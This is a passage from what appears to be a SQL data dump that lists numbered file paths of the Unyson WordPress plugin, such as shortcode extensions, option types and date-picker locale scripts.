n/framework/extensions/shortcodes/shortcodes/section/config.php'),(1565,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/includes/page-builder-section-item/class-page-builder-section-item.php'),(1566,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/includes/page-builder-section-item/static/js/scripts.js'),(1567,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/includes/template-component/class-fw-ext-builder-templates-component-section.php'),(1568,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/includes/template-component/init.php'),(1569,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/includes/template-component/scripts.js'),(1570,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/options.php'),(1571,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/background.init.js'),(1572,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/background.js'),(1573,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/core.js'),(1574,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/jquery.fs.wallpaper.js'),(1575,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/jquery.fs.wallpaper.min.js'),(1576,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/scripts.js'),(1577,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/transition.js'),(1578,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static.php'),(1579,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/views/view.php'),(1580,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/special-heading/config.php'),(1581,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/special-heading/options.php'),(1582,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/special-heading/static.php'),(1583,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/special-heading/views/view.php'),(1584,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/class-fw-shortcode-table.php'),(1585,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/config.php'),(1586,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-table/class-fw-option-type-table.php'),(1587,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-table/static/js/scripts.js'),(1588,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-table/views/cell-head-template.php'),(1589,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-table/views/cell-worksheet-template.php'),(1590,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-table/views/view.php'),(1591,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-textarea-cell/class-fw-option-type-textarea-cell.php'),(1592,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-textarea-cell/static/js/scripts.js'),(1593,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-textarea-cell/views/view.php'),(1594,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/options.php'),(1595,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/static.php'),(1596,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/views/pricing.php'),(1597,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/views/tabular.php'),(1598,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/tabs/config.php'),(1599,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/tabs/options.php'),(1600,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/tabs/static/js/scripts.js'),(1601,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/tabs/static.php'),(1602,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/tabs/views/view.php'),(1603,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/team-member/config.php'),(1604,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/team-member/options.php'),(1605,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/team-member/static.php'),(1606,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/team-member/views/view.php'),(1607,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/testimonials/config.php'),(1608,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/testimonials/options.php'),(1609,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/testimonials/static/js/jquery.carouFredSel-6.2.1-packed.js'),(1610,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/testimonials/static.php'),(1611,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/testimonials/views/view.php'),(1612,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/text-block/config.php'),(1613,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/text-block/options.php'),(1614,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/text-block/views/view.php'),(1615,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/widget-area/class-fw-shortcode-widget-area.php'),(1616,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/widget-area/config.php'),(1617,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/widget-area/options.php'),(1618,'wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/widget-area/views/view.php'),(1619,'wp-content/plugins/unyson/framework/extensions/shortcodes/static/js/aggressive-coder.js'),(1620,'wp-content/plugins/unyson/framework/extensions/shortcodes/static/js/load-shortcodes-data.js'),(1621,'wp-content/plugins/unyson/framework/extensions/shortcodes/static.php'),(1622,'wp-content/plugins/unyson/framework/extensions/social/class-fw-extension-social.php'),(1623,'wp-content/plugins/unyson/framework/extensions/social/extensions/social-facebook/class-fw-extension-social-facebook.php'),(1624,'wp-content/plugins/unyson/framework/extensions/social/extensions/social-facebook/helpers.php'),(1625,'wp-content/plugins/unyson/framework/extensions/social/extensions/social-facebook/manifest.php'),(1626,'wp-content/plugins/unyson/framework/extensions/social/extensions/social-twitter/class-fw-extension-social-twitter.php'),(1627,'wp-content/plugins/unyson/framework/extensions/social/extensions/social-twitter/helpers.php'),(1628,'wp-content/plugins/unyson/framework/extensions/social/extensions/social-twitter/includes/OAuth.php'),(1629,'wp-content/plugins/unyson/framework/extensions/social/extensions/social-twitter/includes/twitteroauth.php'),(1630,'wp-content/plugins/unyson/framework/extensions/social/extensions/social-twitter/manifest.php'),(1631,'wp-content/plugins/unyson/framework/extensions/social/manifest.php'),(1632,'wp-content/plugins/unyson/framework/extensions/social/settings-options.php'),(1633,'wp-content/plugins/unyson/framework/extensions/update/class-fw-extension-update.php'),(1634,'wp-content/plugins/unyson/framework/extensions/update/config.php'),(1635,'wp-content/plugins/unyson/framework/extensions/update/extensions/github-update/class-fw-extension-github-update.php'),(1636,'wp-content/plugins/unyson/framework/extensions/update/extensions/github-update/manifest.php'),(1637,'wp-content/plugins/unyson/framework/extensions/update/includes/classes/class--fw-ext-update-extensions-list-table.php'),(1638,'wp-content/plugins/unyson/framework/extensions/update/includes/classes/class--fw-ext-update-extensions-upgrader-skin.php'),(1639,'wp-content/plugins/unyson/framework/extensions/update/includes/classes/class--fw-ext-update-framework-upgrader-skin.php'),(1640,'wp-content/plugins/unyson/framework/extensions/update/includes/classes/class--fw-ext-update-theme-upgrader-skin.php'),(1641,'wp-content/plugins/unyson/framework/extensions/update/includes/extends/class-fw-ext-update-service.php'),(1642,'wp-content/plugins/unyson/framework/extensions/update/manifest.php'),(1643,'wp-content/plugins/unyson/framework/extensions/update/static/css/admin-update-page.css'),(1644,'wp-content/plugins/unyson/framework/extensions/update/static.php'),(1645,'wp-content/plugins/unyson/framework/extensions/update/views/updates-list.php'),(1646,'wp-content/plugins/unyson/framework/helpers/class-fw-access-key.php'),(1647,'wp-content/plugins/unyson/framework/helpers/class-fw-cache.php'),(1648,'wp-content/plugins/unyson/framework/helpers/class-fw-db-options-model.php'),(1649,'wp-content/plugins/unyson/framework/helpers/class-fw-dumper.php'),(1650,'wp-content/plugins/unyson/framework/helpers/class-fw-flash-messages.php'),(1651,'wp-content/plugins/unyson/framework/helpers/class-fw-form.php'),(1652,'wp-content/plugins/unyson/framework/helpers/class-fw-request.php'),(1653,'wp-content/plugins/unyson/framework/helpers/class-fw-resize.php'),(1654,'wp-content/plugins/unyson/framework/helpers/class-fw-session.php'),(1655,'wp-content/plugins/unyson/framework/helpers/class-fw-wp-filesystem.php'),(1656,'wp-content/plugins/unyson/framework/helpers/class-fw-wp-list-table.php'),(1657,'wp-content/plugins/unyson/framework/helpers/class-fw-wp-meta.php'),(1658,'wp-content/plugins/unyson/framework/helpers/class-fw-wp-option.php'),(1659,'wp-content/plugins/unyson/framework/helpers/database.php'),(1660,'wp-content/plugins/unyson/framework/helpers/fw-google-fonts.json.php'),(1661,'wp-content/plugins/unyson/framework/helpers/fw-storage.php'),(1662,'wp-content/plugins/unyson/framework/helpers/general.php'),(1663,'wp-content/plugins/unyson/framework/helpers/meta.php'),(1664,'wp-content/plugins/unyson/framework/helpers/type/class-fw-type-register.php'),(1665,'wp-content/plugins/unyson/framework/helpers/type/class-fw-type.php'),(1666,'wp-content/plugins/unyson/framework/includes/container-types/box/class-fw-container-type-box.php'),(1667,'wp-content/plugins/unyson/framework/includes/container-types/class-fw-container-type-undefined.php'),(1668,'wp-content/plugins/unyson/framework/includes/container-types/init.php'),(1669,'wp-content/plugins/unyson/framework/includes/container-types/popup/class-fw-container-type-popup.php'),(1670,'wp-content/plugins/unyson/framework/includes/container-types/popup/scripts.js'),(1671,'wp-content/plugins/unyson/framework/includes/container-types/popup/styles.css'),(1672,'wp-content/plugins/unyson/framework/includes/container-types/simple.php'),(1673,'wp-content/plugins/unyson/framework/includes/container-types/tab/class-fw-container-type-tab.php'),(1674,'wp-content/plugins/unyson/framework/includes/container-types/tab/view.php'),(1675,'wp-content/plugins/unyson/framework/includes/customizer/class--fw-customizer-control-option-wrapper.php'),(1676,'wp-content/plugins/unyson/framework/includes/customizer/class--fw-customizer-setting-option.php'),(1677,'wp-content/plugins/unyson/framework/includes/hooks.php'),(1678,'wp-content/plugins/unyson/framework/includes/option-storage/class--fw-option-storage-type-register.php'),(1679,'wp-content/plugins/unyson/framework/includes/option-storage/class-fw-option-storage-type.php'),(1680,'wp-content/plugins/unyson/framework/includes/option-storage/type/class-fw-option-storage-type-post-meta.php'),(1681,'wp-content/plugins/unyson/framework/includes/option-storage/type/class-fw-option-storage-type-wp-option.php'),(1682,'wp-content/plugins/unyson/framework/includes/option-types/addable-box/class-fw-option-type-addable-box.php'),(1683,'wp-content/plugins/unyson/framework/includes/option-types/addable-box/static/css/styles.css'),(1684,'wp-content/plugins/unyson/framework/includes/option-types/addable-box/static/js/scripts.js'),(1685,'wp-content/plugins/unyson/framework/includes/option-types/addable-box/view.php'),(1686,'wp-content/plugins/unyson/framework/includes/option-types/addable-option/class-fw-option-type-addable-option.php'),(1687,'wp-content/plugins/unyson/framework/includes/option-types/addable-option/static/css/styles.css'),(1688,'wp-content/plugins/unyson/framework/includes/option-types/addable-option/static/js/scripts.js'),(1689,'wp-content/plugins/unyson/framework/includes/option-types/addable-option/view.php'),(1690,'wp-content/plugins/unyson/framework/includes/option-types/addable-popup/class-fw-option-type-addable-popup.php'),(1691,'wp-content/plugins/unyson/framework/includes/option-types/addable-popup/static/css/styles.css'),(1692,'wp-content/plugins/unyson/framework/includes/option-types/addable-popup/static/js/addable-popup.js'),(1693,'wp-content/plugins/unyson/framework/includes/option-types/addable-popup/views/view.php'),(1694,'wp-content/plugins/unyson/framework/includes/option-types/background-image/class-fw-option-type-background-image.php'),(1695,'wp-content/plugins/unyson/framework/includes/option-types/background-image/static/css/styles.css'),(1696,'wp-content/plugins/unyson/framework/includes/option-types/background-image/static/js/scripts.js'),(1697,'wp-content/plugins/unyson/framework/includes/option-types/background-image/view.php'),(1698,'wp-content/plugins/unyson/framework/includes/option-types/class-fw-option-type-undefined.php'),(1699,'wp-content/plugins/unyson/framework/includes/option-types/color-picker/class-fw-option-type-color-picker.php'),(1700,'wp-content/plugins/unyson/framework/includes/option-types/color-picker/static/css/styles.css'),(1701,'wp-content/plugins/unyson/framework/includes/option-types/color-picker/static/js/scripts.js'),(1702,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/class-fw-option-type-wp-date-picker.php'),(1703,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/css/datepicker.css'),(1704,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/bootstrap-datepicker.js'),(1705,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ar.min.js'),(1706,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.az.min.js'),(1707,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.bg.min.js'),(1708,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.bs.min.js'),(1709,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ca.min.js'),(1710,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.cs.min.js'),(1711,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.cy.min.js'),(1712,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.da.min.js'),(1713,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.de.min.js'),(1714,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.el.min.js'),(1715,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.en-AU.min.js'),(1716,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.en-GB.min.js'),(1717,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.eo.min.js'),(1718,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.es.min.js'),(1719,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.et.min.js'),(1720,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.eu.min.js'),(1721,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.fa.min.js'),(1722,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.fi.min.js'),(1723,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.fo.min.js'),(1724,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.fr-CH.min.js'),(1725,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.fr.min.js'),(1726,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.gl.min.js'),(1727,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.he.min.js'),(1728,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.hr.min.js'),(1729,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.hu.min.js'),(1730,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.hy.min.js'),(1731,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.id.min.js'),(1732,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.is.min.js'),(1733,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.it-CH.min.js'),(1734,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.it.min.js'),(1735,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ja.min.js'),(1736,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ka.min.js'),(1737,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.kh.min.js'),(1738,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.kk.min.js'),(1739,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ko.min.js'),(1740,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.kr.min.js'),(1741,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.lt.min.js'),(1742,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.lv.min.js'),(1743,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.me.min.js'),(1744,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.mk.min.js'),(1745,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.mn.min.js'),(1746,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ms.min.js'),(1747,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.nb.min.js'),(1748,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.nl-BE.min.js'),(1749,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.nl.min.js'),(1750,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.no.min.js'),(1751,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.pl.min.js'),(1752,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.pt-BR.min.js'),(1753,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.pt.min.js'),(1754,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ro.min.js'),(1755,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.rs-latin.min.js'),(1756,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.rs.min.js'),(1757,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.ru.min.js'),(1758,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.sk.min.js'),(1759,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.sl.min.js'),(1760,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.sq.min.js'),(1761,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.sr-latin.min.js'),(1762,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.sr.min.js'),(1763,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.sv.min.js'),(1764,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.sw.min.js'),(1765,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.th.min.js'),(1766,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.tr.min.js'),(1767,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.uk.min.js'),(1768,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.vi.min.js'),(1769,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.zh-CN.min.js'),(1770,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.zh-TW.min.js'),(1771,'wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/scripts.js'),(1772,'wp-content/plugins/unyson/framework/includes/option-types/datetime-picker/class-fw-option-type-datetime-picker.php'),(1773,'wp-content/plugins/unyson/framework/includes/option-types/datetime-picker/static/css/jquery.datetimepicker.css'),(1774,'wp-content/plugins/unyson/framework/includes/option-types/datetime-picker/static/css/style.css'),(1775,'wp-content/plugins/unyson/framework/includes/option-types/datetime-picker/static/js/jquery.datetimepicker.js'),(1776,'wp-content/plugins/unyson/framework/includes/option-types/datetime-picker/static/js/script.js'),(1777,'wp-content/plugins/unyson/framework/includes/option-types/datetime-range/class-fw-option-type-datetime-range.php'),(1778,'wp-content/plugins/unyson/framework/includes/option-types/datetime-range/static/css/styles.css'),(1779,'wp-content/plugins/unyson/framework/includes/option-types/datetime-range/static/js/script.js'),(1780,'wp-content/plugins/unyson/framework/includes/option-types/datetime-range/view.php'),(1781,'wp-content/plugins/unyson/framework/includes/option-types/gradient/class-fw-option-type-gradient.php'),(1782,'wp-content/plugins/unyson/framework/includes/option-types/gradient/static/css/styles.css'),(1783,'wp-content/plugins/unyson/framework/includes/option-types/gradient/static/js/scripts.js'),(1784,'wp-content/plugins/unyson/framework/includes/option-types/gradient/view.php'),(1785,'wp-content/plugins/unyson/framework/includes/option-types/icon/README.md'),(1786,'wp-content/plugins/unyson/framework/includes/option-types/icon/class-fw-option-type-icon.php'),(1787,'wp-content/plugins/unyson/framework/includes/option-types/icon/static/css/backend.css'),(1788,'wp-content/plugins/unyson/framework/includes/option-types/icon/static/js/backend.js'),(1789,'wp-content/plugins/unyson/framework/includes/option-types/icon/view.php'),(1790,'wp-content/plugins/unyson/framework/includes/option-types/icon-v2/class-fw-option-type-icon-v2.php'),(1791,'wp-content/plugins/unyson/framework/includes/option-types/icon-v2/includes/class-fw-icon-v2-favorites.php'),(1792,'wp-content/plugins/unyson/framework/includes/option-types/icon-v2/includes/class-fw-icon-v2-packs-loader.php'),(1793,'wp-content/plugins/unyson/framework/includes/option-types/icon-v2/static/css/picker.css'),(1794,'wp-content/plugins/unyson/framework/includes/option-types/icon-v2/static/img/no-image.png'),(1795,'wp-content/plugins/unyson/framework/includes/option-types/icon-v2/static/img/sauron.png'),(1796,'wp-content/plugins/unyson/framework/includes/option-types/icon-v2/static/img/transparent_bg.png'),(1797,'wp-content/plugins/unyson/framework/includes/option-types/icon-v2/static/js/icon-picker.js'),(1798,'wp-content/plugins/unyson/framework/includes/option-types/icon-v2/static/js/render-icon-previews.js'),(1799,'wp-content/plugins/unyson/framework/includes/option-types/icon-v2/view.php'),(1800,'wp-content/plugins/unyson/framework/includes/option-types/image-picker/class-fw-option-type-image-picker.php'),(1801,'wp-content/plugins/unyson/framework/includes/option-types/image-picker/static/css/styles.css'),(1802,'wp-content/plugins/unyson/framework/includes/option-types/image-picker/static/js/image-picker/image-picker.js'),(1803,'wp-content/plugins/unyson/framework/includes/option-types/image-picker/static/js/image-picker/image-picker.min.js'),(1804,'wp-content/plugins/unyson/framework/includes/option-types/image-picker/static/js/image-picker/imagesloaded.pkg.min.js'),(1805,'wp-content/plugins/unyson/framework/includes/option-types/image-picker/static/js/scripts.js'),(1806,'wp-content/plugins/unyson/framework/includes/option-types/init.php'),(1807,'wp-content/plugins/unyson/framework/includes/option-types/map/class-fw-option-type-map.php'),(1808,'wp-content/plugins/unyson/framework/includes/option-types/map/static/css/style.css'),(1809,'wp-content/plugins/unyson/framework/includes/option-types/map/static/js/scripts.js'),(1810,'wp-content/plugins/unyson/framework/includes/option-types/map/views/view.php'),(1811,'wp-content/plugins/unyson/framework/includes/option-types/multi/class-fw-option-type-multi.php'),(1812,'wp-content/plugins/unyson/framework/includes/option-types/multi/static/css/styles.css'),(1813,'wp-content/plugins/unyson/framework/includes/option-types/multi-picker/class-fw-option-type-multi-picker.php'),(1814,'wp-content/plugins/unyson/framework/includes/option-types/multi-picker/static/css/multi-picker.css'),(1815,'wp-content/plugins/unyson/framework/includes/option-types/multi-picker/static/js/multi-picker.js'),(1816,'wp-content/plugins/unyson/framework/includes/option-types/multi-select/class-fw-option-type-multi-select.php'),(1817,'wp-content/plugins/unyson/framework/includes/option-types/multi-select/static/css/style.css'),(1818,'wp-content/plugins/unyson/framework/includes/option-types/multi-select/static/js/scripts.js'),(1819,'wp-content/plugins/unyson/framework/includes/option-types/multi-upload/class-fw-option-type-multi-upload.php'),(1820,'wp-content/plugins/unyson/framework/includes/option-types/multi-upload/static/css/any-files.css'),(1821,'wp-content/plugins/unyson/framework/includes/option-types/multi-upload/static/css/images-only.css'),(1822,'wp-content/plugins/unyson/framework/includes/option-types/multi-upload/static/css/modal.css'),(1823,'wp-content/plugins/unyson/framework/includes/option-types/multi-upload/static/js/any-files.js'),(1824,'wp-content/plugins/unyson/framework/includes/option-types/multi-upload/static/js/images-only.js'),(1825,'wp-content/plugins/unyson/framework/includes/option-types/multi-upload/views/any-files.php'),(1826,'wp-content/plugins/unyson/framework/includes/option-types/multi-upload/views/images-only.php'),(1827,'wp-content/plugins/unyson/framework/includes/option-types/oembed/class-fw-option-type-oembed.php'),(1828,'wp-content/plugins/unyson/framework/includes/option-types/oembed/static/css/styles.css'),(1829,'wp-content/plugins/unyson/framework/includes/option-types/oembed/static/js/oembed.js'),(1830,'wp-content/plugins/unyson/framework/includes/option-types/oembed/view.php'),(1831,'wp-content/plugins/unyson/framework/includes/option-types/popup/class-fw-option-type-popup.php'),(1832,'wp-content/plugins/unyson/framework/includes/option-types/popup/static/css/styles.css'),(1833,'wp-content/plugins/unyson/framework/includes/option-types/popup/static/js/popup.js'),(1834,'wp-content/plugins/unyson/framework/includes/option-types/popup/views/view.php'),(1835,'wp-content/plugins/unyson/framework/includes/option-types/radio-text/class-fw-option-type-radio-text.php'),(1836,'wp-content/plugins/unyson/framework/includes/option-types/radio-text/static/css/styles.css'),(1837,'wp-content/plugins/unyson/framework/includes/option-types/radio-text/static/js/scripts.js'),(1838,'wp-content/plugins/unyson/framework/includes/option-types/radio-text/view.php'),(1839,'wp-content/plugins/unyson/framework/includes/option-types/range-slider/class-fw-option-type-range-slider.php'),(1840,'wp-content/plugins/unyson/framework/includes/option-types/range-slider/static/css/styles.css'),(1841,'wp-content/plugins/unyson/framework/includes/option-types/range-slider/static/js/scripts.js'),(1842,'wp-content/plugins/unyson/framework/includes/option-types/range-slider/static/libs/ion-range-slider/ion.rangeSlider.css'),(1843,'wp-content/plugins/unyson/framework/includes/option-types/range-slider/static/libs/ion-range-slider/ion.rangeSlider.min.js'),(1844,'wp-content/plugins/unyson/framework/includes/option-types/range-slider/view.php'),(1845,'wp-content/plugins/unyson/framework/includes/option-types/rgba-color-picker/class-fw-option-type-rgba-color-picker.php'),(1846,'wp-content/plugins/unyson/framework/includes/option-types/rgba-color-picker/static/css/styles.css'),(1847,'wp-content/plugins/unyson/framework/includes/option-types/rgba-color-picker/static/images/transparency-grid.png'),(1848,'wp-content/plugins/unyson/framework/includes/option-types/rgba-color-picker/static/js/scripts.js'),(1849,'wp-content/plugins/unyson/framework/includes/option-types/simple.php'),(1850,'wp-content/plugins/unyson/framework/includes/option-types/slider/class-fw-option-type-short-slider.php'),(1851,'wp-content/plugins/unyson/framework/includes/option-types/slider/class-fw-option-type-slider.php'),(1852,'wp-content/plugins/unyson/framework/includes/option-types/slider/static/css/styles.css'),(1853,'wp-content/plugins/unyson/framework/includes/option-types/slider/static/js/scripts.js'),(1854,'wp-content/plugins/unyson/framework/includes/option-types/slider/static/libs/ion-range-slider/ion.rangeSlider.css'),(1855,'wp-content/plugins/unyson/framework/includes/option-types/slider/static/libs/ion-range-slider/ion.rangeSlider.min.js'),(1856,'wp-content/plugins/unyson/framework/includes/option-types/slider/view.php'),(1857,'wp-content/plugins/unyson/framework/includes/option-types/switch/class-fw-option-type-switch.php'),(1858,'wp-content/plugins/unyson/framework/includes/option-types/switch/static/adaptive-switch/jquery.adaptive-switch.js'),(1859,'wp-content/plugins/unyson/framework/includes/option-types/switch/static/adaptive-switch/styles.css'),(1860,'wp-content/plugins/unyson/framework/includes/option-types/switch/static/css/styles.css'),(1861,'wp-content/plugins/unyson/framework/includes/option-types/switch/static/js/scripts.js'),(1862,'wp-content/plugins/unyson/framework/includes/option-types/typography/class-fw-option-type-typography.php'),(1863,'wp-content/plugins/unyson/framework/includes/option-types/typography/static/css/styles.css'),(1864,'wp-content/plugins/unyson/framework/includes/option-types/typography/static/images/google-fonts.png'),(1865,'wp-content/plugins/unyson/framework/includes/option-types/typography/static/js/scripts.js'),(1866,'wp-content/plugins/unyson/framework/includes/option-types/typography/view.php'),(1867,'wp-content/plugins/unyson/framework/includes/option-types/typography-v2/class-fw-option-type-typography-v2.php'),(1868,'wp-content/plugins/unyson/framework/includes/option-types/typography-v2/static/css/styles.css'),(1869,'wp-content/plugins/unyson/framework/includes/option-types/typography-v2/static/js/scripts.js'),(1870,'wp-content/plugins/unyson/framework/includes/option-types/typography-v2/view.php'),(1871,'wp-content/plugins/unyson/framework/includes/option-types/upload/class-fw-option-type-upload.php'),(1872,'wp-content/plugins/unyson/framework/includes/option-typ